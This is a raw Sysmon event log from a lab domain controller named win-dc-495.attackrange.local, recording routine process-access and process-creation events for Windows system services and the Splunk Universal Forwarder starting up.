13:36:35.076{59A5CD1D-8E44-6005-0A00-00000000A301}8481100C:\Windows\system32\services.exe{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\services.exe+3332|C:\Windows\system32\services.exe+6334|C:\Windows\system32\services.exe+dc24|C:\Windows\system32\services.exe+d248|C:\Windows\system32\services.exe+4d0c|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000003579Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:35.084{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe8.0.2splunkd servicesplunk ApplicationSplunk Inc.splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" serviceC:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589{59A5CD1D-8E44-6005-0A00-00000000A301}848C:\Windows\System32\services.exeC:\Windows\system32\services.exe 10341000x80000000000000003820Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:36.827{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-8EE4-6005-C400-00000000A301}3508C:\Program 
Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003819Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:36.827{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003818Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:36:36.827{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003817Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:36.827{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003816Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:36:36.827{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003815Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:36.827{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003814Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:36:36.827{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003813Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:36.827{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003812Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:36:36.827{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003811Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:36.827{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003810Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:36.827{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-8EE4-6005-C400-00000000A301}3508C:\Program 
Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000003809Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:36.827{59A5CD1D-8EE4-6005-C200-00000000A301}24882604C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe{59A5CD1D-8EE4-6005-C400-00000000A301}3508C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+4022c|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+403f8|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+404c7|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+40fee|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+64ab|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+1807c|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+1adfc|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+4cf68|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000003808Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:36.833{59A5CD1D-8EE4-6005-C400-00000000A301}3508C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe8.0.2splunkd servicesplunk ApplicationSplunk Inc.splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE" check-licenseC:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589{59A5CD1D-8EE4-6005-C200-00000000A301}2488C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe"C:\Program 
Files\SplunkUniversalForwarder\bin\splunk.exe" _internal pre-flight-checks --answer-yes --no-prompt 10341000x80000000000000003807Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:36.796{59A5CD1D-8EE4-6005-C300-00000000A301}28963256C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+116e675|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+116e1a6|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+f344c|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+f2a91|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+19fdb50|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003806Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:36.577{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-8EE4-6005-C300-00000000A301}2896C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003805Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:36:36.577{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003804Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:36.577{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003803Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:36:36.561{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003802Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:36.561{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003801Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:36:36.561{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003800Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:36.561{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003799Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:36:36.561{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003798Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:36.561{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003797Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:36:36.561{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003796Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:36.561{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-8EE4-6005-C300-00000000A301}2896C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 